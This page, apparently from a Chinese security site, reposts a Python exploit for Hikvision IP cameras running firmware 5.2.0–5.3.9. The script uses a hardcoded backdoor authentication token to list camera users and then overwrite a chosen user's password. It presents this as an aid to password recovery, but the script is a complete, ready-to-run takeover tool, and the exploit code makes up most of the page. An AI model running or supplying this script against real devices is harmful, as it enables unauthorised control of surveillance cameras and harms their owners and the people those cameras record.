首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 - 170109) - Access Con
来源:vfocus.net 作者:Matamorphosis 发布时间:2018-03-26  
# Exploit Title: Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109) Backdoor
# Date: 15-03-2018
# Vendor Homepage: http://www.hikvision.com/en/
# Exploit Author: Matamorphosis
# Category: Web Apps
# Description: Exploits a backdoor in Hikvision camera firmware versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109), deployed between 2014 and 2016, to assist the owner recover their password.
# Vulnerability Exploited: ICSA-17-124-01 - http://seclists.org/fulldisclosure/2017/Sep/23
 
#!/usr/bin/env python
# Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]
 
import requests
import re
import sys
 
# BASIC INFO
 
newPass = "@Dm1N1$Tr80R" # EXAMPLE OF A PASSWORD COMPLIANT WITH LATER FIRMWARES REQUIRING AT LEAST 2 UPPERCASE, 2 lowercase, and 2 SPECIAL CHARACTERS.
BackdoorAuthArg = "auth=YWRtaW46MTEK"; # AUTHENTICATION KEY.
ip = ""
port = 0
SSL = ""
userID = ""
userName = ""
 
def Usage():
    print("[i] Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]")
 
try:
    ip = sys.argv[1]
    SSL = sys.argv[3]
 
except:
    print("[-] One or more of the arguments is missing.")
    Usage()
    sys.exit()
 
ipmatch = re.search(r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b", ip)          # IP ADDRESS REGULAR EXPRESSION.
 
if not ipmatch:
    print("[-] The entered ip address " + ip + " is not in the correct format.")
    Usage()
    sys.exit()
 
try:
    port = int(sys.argv[2])
 
except:
    print("[-] The entered port " + sys.argv[2] + " is not a number.")
    Usage()
    sys.exit()
 
if (port == 0) or (port > 65535):
    print("[-] The entered port " + sys.argv[2] + " is not a valid port number.")
    Usage()
    sys.exit()
 
if SSL == "Y":
    protocol = "https"
 
else:
    protocol = "http"
 
URLBase = protocol + "://" + ip + ":" + str(port) + "/"                     # URL BASE FOR FUTURE REQUESTS.
URLDownload = URLBase + "Security/users?" + BackdoorAuthArg                 # DOWNLOAD REQUEST.
 
print("[+] Getting User List.")
 
DownloadResponse = requests.get(URLDownload).text
 
for line in DownloadResponse:                                               # RETRIEVING USER LIST
    useridmatch = re.search(r"<id>(.*)<\/id>", line)                        # CHECK FOR USER ID.
    usernamematch = re.search(r"<userName>(.*)<\/userName>", line)          # CHECK FOR USER NAME.
 
    if useridmatch:
        userID = useridmatch.group(1)
        print("[+] User ID: " + userID)
 
    if usernamematch:
        userName = usernamematch.group(1)
        print("[+] Username: " + userName)
 
userID = raw_input("[?] Which User ID would you like to use? ")
userName = raw_input("[?] Which Username would you like to use? ")
 
print("[+] Using the User " + userName + ".")
 
userXML = ( '<User version=""1.0"" xmlns=""http://www.hikvision.com/ver10/XMLSchema"">\r\n<id>' + userID + '</id>\r\n<userName>' + userName + '</userName>\r\n<password>' + newPass + '</password>\r\n</User>' ) # OUR CRAFTED XML CONFIGURATION FILE
 
#print(userXML)
 
URLUpload = URLBase + "Security/users/" + userID + "?" + BackdoorAuthArg    # UPLOAD REQUEST.
 
print("[+] Changing Password now.")
 
print requests.put(URLUpload, data=userXML).text                            # UPLOAD REQUEST, SENDING THE PAYLOAD.
 
print("[+] Complete. Please try logging in with these credentials. Username: " + userName + "Password: " + newPass)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Android Bluetooth - BNEP BNEP_
·Allok Quicktime to AVI MPEG DV
·Android Bluetooth - BNEP bnep_
·Crashmail 1.6 - Stack-Based Bu
·ModSecurity For Nginx Use-Afte
·Dell EMC NetWorker - Denial of
·Kaseya Virtual System Administ
·WM Recorder 16.8.1 - Denial of
·Linux Kernel < 4.15.4 - 'show_
·TL-WR720N 150Mbps Wireless N R
·Cisco node-jos < 0.11.0 - Re-s
·XenForo 2 - CSS Loader Denial
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved